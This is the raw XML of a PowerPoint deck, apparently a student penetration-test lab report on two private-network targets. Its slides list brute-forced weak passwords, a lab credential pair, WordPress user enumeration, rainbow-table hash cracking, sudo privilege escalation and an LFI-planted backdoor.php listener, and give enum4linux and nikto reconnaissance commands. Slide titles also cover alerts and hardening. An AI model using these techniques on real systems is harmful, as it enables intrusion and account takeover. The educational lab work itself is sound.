            <a:ext cx="17520100" cy="103721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14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73" name="Google Shape;2373;p1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74" name="Google Shape;2374;p141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="23878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75" name="Google Shape;2375;p141"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703363" y="3249675"/>
          <a:ext cx="22244700" cy="9866700"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{F20E4E4F-5AFD-4F6A-9958-DA7E82634756}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7414900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7414900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7414900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1460350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</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Description</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Impact</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1820600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Passwords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Was able to find passwords using dictionary brute force against web form</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protected web directories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Wordpress User Enumeration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enum4linux to gather user information for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to gather usernames to gain access to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Unprotected and Unsalted Hash</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Used Rainbow table to compare an unprotected hash to a corresponding password</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WebDav to alter contents of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2195250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Privilege Escalation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 Used Stevens sudo Python access to escalate from ‘Steven to root’ </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privilege escalation to root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Critical Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2381" name="Google Shape;2381;p1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82" name="Google Shape;2382;p142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="23878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2</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83" name="Google Shape;2383;p142"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="703425" y="3330825"/>
          <a:ext cx="22244700" cy="9431425"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{F20E4E4F-5AFD-4F6A-9958-DA7E82634756}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7414900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7414900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7414900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1311900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</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Description</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="4000" b="1">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">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2013175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Wordpress User Enumeration</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" b="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nikto to gather user information for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to gather usernames to gain access to the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2013175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Exploration</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Utilized gobuster to gather non descript directories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attacker insight into which directories allow which users access (if at all)</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2013175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Exposed Directory/Exposed Content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Plaintext information used to locate a hidden directory and other content</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Allowed attacker to discover non listed directories for vulnerabilities</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2080000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Local File Inclusion (LFI)</a:t>
                      </a:r>
                      <a:endParaRPr sz="30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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Used LFI to push backdoor.php listener to web server</a:t>
                      </a:r>
                      <a:endParaRPr sz="30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3000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allows target machine communicates back to the attacking machine via direct command line access</a:t>
                      </a:r>
                      <a:endParaRPr sz="30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pic>
        <p:nvPicPr>
          <p:cNvPr id="2388" name="Google Shape;2388;p1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89" name="Google Shape;2389;p14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7</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2390" name="Google Shape;2390;p143"/>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91" name="Google Shape;2391;p143"/>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Wordpress User Enumeration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97" name="Google Shape;2397;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98" name="Google Shape;2398;p1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Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="40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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enum4linux -a 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1"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Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="40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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -C all -h 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1"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a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gained critical information needed to gain access to the server via SSH</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5056751C-F0F5-4EC5-B9FF-D5C9B5AECCAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="8720667"/>
            <a:ext cx="8406758" cy="4313633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE78338-471A-4BD8-AA1F-5D5ACA8FCCFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10791825" y="8634345"/>
            <a:ext cx="10820400" cy="44862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14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Weak Passwords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05" name="Google Shape;2405;p1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406" name="Google Shape;2406;p145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="19246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 </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Manual brute force;</a:t>
            </a:r>
            <a:endParaRPr sz="40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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username: Michael</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="2" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>michael</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Grants access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>michaels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> account via SSH</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6673A47F-2597-4422-922E-7FBF691268A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2633662" y="7878234"/>
            <a:ext cx="12071785" cy="5188566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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1654</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>258</Paragraphs>
  <Slides>32</Slides>
  <Notes>32</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32</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="49" baseType="lpstr">
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Amatic SC</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Poppins Medium</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>2_Custom Design</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Dharani,Junior Stanley,Waleed ,Conrad</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Exploits Used </vt:lpstr>
      <vt:lpstr>Exploitation: Wordpress User Enumeration  </vt:lpstr>
      <vt:lpstr>Exploitation: Weak Passwords  </vt:lpstr>
      <vt:lpstr>Exploitation: Directory Exploration  </vt:lpstr>
      <vt:lpstr>Exploitation: Unprotected and Unsalted Hash</vt:lpstr>
      <vt:lpstr>Exploitation: Privilege Escalation  </vt:lpstr>
      <vt:lpstr>Exploitation: Local File Inclusion (LFI)  </vt:lpstr>
      <vt:lpstr>Exploitation: Local File Inclusion (LFI) {Support Info}  </vt:lpstr>
      <vt:lpstr>Maintaining Access </vt:lpstr>
      <vt:lpstr>Backdooring the Target</vt:lpstr>
      <vt:lpstr>Alerts Implemented  </vt:lpstr>
      <vt:lpstr>Excessive HTTP Errors</vt:lpstr>
      <vt:lpstr>HTTP Request Size Monitor </vt:lpstr>
      <vt:lpstr>CPU Usage Monitor </vt:lpstr>
      <vt:lpstr>Hardening  </vt:lpstr>
      <vt:lpstr>Hardening Against Wordpress Enumeration on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Against Unprotected and Unsalted Hash on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Against Privilege Escalation on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Against Directory Exploration on Target 2</vt:lpstr>
      <vt:lpstr>Hardening Against LFI on Target 2</vt:lpstr>
      <vt:lpstr>Implementing Patches  </vt:lpstr>
      <vt:lpstr>Implementing Patches with Ansible</vt:lpstr>
      <vt:lpstr>Malicious Activity   </vt:lpstr>
      <vt:lpstr>Illegal Downloads </vt:lpstr>
      <vt:lpstr>Illegal Downloads </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Dharani Kumar Krishnan</dc:title>
  <dc:creator>Dharani Kumar Krishnan</dc:creator>
  <cp:lastModifiedBy>Dharani Kumar Krishnan</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-19T15:17:16Z</dcterms:modified>
</cp:coreProperties>
</file>